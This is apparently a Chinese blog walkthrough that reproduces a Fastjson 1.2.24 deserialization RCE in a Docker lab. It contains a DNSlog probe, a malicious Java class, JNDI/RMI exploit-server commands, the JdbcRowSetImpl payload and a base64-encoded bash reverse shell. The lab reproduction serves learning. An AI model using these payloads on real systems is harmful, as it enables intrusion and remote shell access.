fastjson【1224--rce】漏洞初探索及复现

机器说明

靶机：docker搭建的fastjson环境，其ip地址为192.168.10.6

攻击：

网站服务器为windows物理机，ip地址为192.168.10.9

RMI服务，也是建立在windows物理机，ip地址为192.168.10.9

fastjson判断识别

首先先确定是否为json，json有其特征

通过返回包判断是否使用了 Fastjson。例如，如果提交方式改为 POST，并且 JSON 字符串花括号不闭合，返回包中可能会出现 Fastjson 字样

这里可以通过burp抓取数据包，然后判断

抓取原始的数据请求，可以看到是get请求，并且json

那么现在把请求改为post，然后查看返回是否有提示

通过不闭合花括号测试，不过这里测试，发现返回 并没有提示，不过方法知道

漏洞判断

目前确定是json了，那么是否存在漏洞，进一步探测，测试是否可出网，借助dnslog

//这是老版本的构造
{"test":
    {
  		"@type":"java.net.Inet4Address",
  		"val":"5go1j8.dnslog.cn"
	}
}

//1.2.67版本后payload
{
  	"@type":"java.net.Inet4Address",
  	"val":"5go1j8.dnslog.cn"
}

fastjson1224-rce复现

编译class文件执行命令

首先在自己的服务器上创建一个test.java文件，然后编译为class文件。java代码如下

// javac test.java
import java.lang.Runtime;
import java.lang.Process;

public class test{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

然后执行javac test.java，就可以在当前目录下生成一个test.class文件，主要的就是这个文件，确保靶机可以访问到服务器。

这里还使用到一个工具marshalsec-0.0.3-SNAPSHOT-all.jar，这个在gihub上是有项目地址的，有编译好的，也有未编译好的。https://github.com/RandomRobbieBF/marshalsec-jar.git

在服务器上执行下面的语句，使得启动一个RMI服务器，监听9999端口，并指定加载远程类test.class

这里建议采用java8，我这里是安装java8后，使用其绝对路径。java8的官网下载https://www.java.com/zh-cn/download/manual.jsp

C:\"Program Files"\Java\jre1.8.0_441\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.10.9:1234/#test 9999

执行之后，这里已经开始监听了

现在就是需要通过burp抓取之前的数据包，并对其做出修改，使得其json数据中，请求了这个服务器中的文件

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.10.9:9999/test",
        "autoCommit":true
    }
}

构造后，点击发送，虽然服务器的反应是500，但是通过rmi服务器可以看到成功获取了

这里看看rmi服务器的监听

但是不知道为什么，在靶机就是没有看到对应的文件。

然后我采用python3开启简易的服务，发现已经请求了test.class文件，但是不知道为什么，没有执行创建的命令

网上查了一下，这个对于java的环境要求严格，进行编译文件的javac，其版本也必须是1.8啧，去官网下载还需要再注册一下，有点麻烦了。所以换一个工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

借助另一个工具

首先还是需要java8的环境，因为前面我只下载了java8对于javac并没有下载，所以换工具

在windows中执行代码，启动工具

& 'C:\Program Files\Java\jre1.8.0_441\bin\java.exe' -jar .\JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'touch /tmp/success' -A 192.168.10.9

然后选择1.8版本的rmi链接，再到burp中重新放包即可

这时候去docker中去验证一下是否创建这个文件

docker exec -it 559c50c831db /bin/bash

说明命令成功了，那么再构造反弹shell测试

& 'C:\Program Files\Java\jre1.8.0_441\bin\java.exe' -jar .\JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuOS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.10.9

还是访问1.8版本的，大致如下

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.10.9:1099/97idjg",
        "autoCommit":true
    }
}

然后在windows中使用ncat.exe开启监听9999端口。

这时候再通过burp抓取数据包修改，即可成功反弹shell

总结

该漏洞，主要就是因为可以出网，并且通过函数导致命令可以在请求的时候，执行相关命令

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.10.9:1099/97idjg",
        "autoCommit":true
    }
}

这是主要利用代码，就是通过json格式的数据传给服务器，dataSourceName可以执行rmi中的class文件的内容